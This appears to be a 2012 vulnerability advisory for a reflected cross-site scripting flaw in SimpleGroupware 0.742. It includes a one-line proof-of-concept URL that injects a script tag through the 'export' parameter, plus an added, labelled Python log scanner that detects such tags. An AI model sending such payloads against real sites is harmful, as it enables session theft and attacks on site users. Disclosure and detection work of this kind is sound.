INFOSERVE-ADV2012-01 - SimpleGroupware 0.742 Cross-Site-Scripting vulnerability
Advisory: SimpleGroupware 0.742 Cross-Site-Scripting vulnerability
Advisory ID: INFOSERVE-ADV2012-01
Author: Stefan Schurtz
Contact:
Affected Software: Successfully tested on SimpleGroupware 0.742
Vendor URL:
Vendor Status: fixed (see Changelog)
======================
Vulnerability Description
======================
SimpleGroupware 0.742 ‘export’ parameter XSS vulnerability
==============
PoC-Exploit
==============
http://[target]/SimpleGroupware_0.742/bin/index.php?export=<ScRiPt >alert('xss')</ScRiPt>
=====
Solution
=====
Upgrade to the latest version 0.743.
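Added example, not part of the original advisory or of SimpleGroupware: a Python check that scans web server access log lines for requests whose 'export' parameter contains an HTML tag after URL decoding, matching tag names case-insensitively because the PoC uses mixed case. The combined log format, the function names, the benign value `csv` and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Opening or closing HTML tag; IGNORECASE so "<ScRiPt" matches like "<script".
TAG_RE = re.compile(r'<\s*/?\s*[a-z!]', re.IGNORECASE)

# Constructed sample entries: the advisory's PoC (percent-encoded) and a benign request.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Feb/2012:10:01:02 +0100] "GET /SimpleGroupware_0.742/bin/index.php'
    '?export=%3CScRiPt%20%3Ealert(%27xss%27)%3C/ScRiPt%3E HTTP/1.1" 200 5120',
    '192.0.2.12 - - [03/Feb/2012:10:03:44 +0100] "GET /SimpleGroupware_0.742/bin/index.php'
    '?export=csv HTTP/1.1" 200 830',
]


def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding so nested encodings are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_export(log_line):
    """Return the decoded 'export' value if it contains an HTML tag, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    query = urlsplit(match.group(1)).query
    # parse_qs performs the first round of percent-decoding.
    for raw in parse_qs(query, keep_blank_values=True).get("export", []):
        value = decode_fully(raw)
        if TAG_RE.search(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every suspicious request."""
    hits = ((n, suspicious_export(line)) for n, line in enumerate(lines, start=1))
    return [(n, value) for n, value in hits if value is not None]


if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: export={value!r}")
```

A hit only shows that a request was made, not that the installed version reflected it; whether the response was vulnerable depends on the installed version.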
================
Disclosure Timeline
================
01-Feb-2012 – informed vendor
02-Feb-2012 – fixed by vendor
====
Credits
====
Vulnerability found and advisory written by the INFOSERVE security team.
=======
References
=======
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2012-01.txt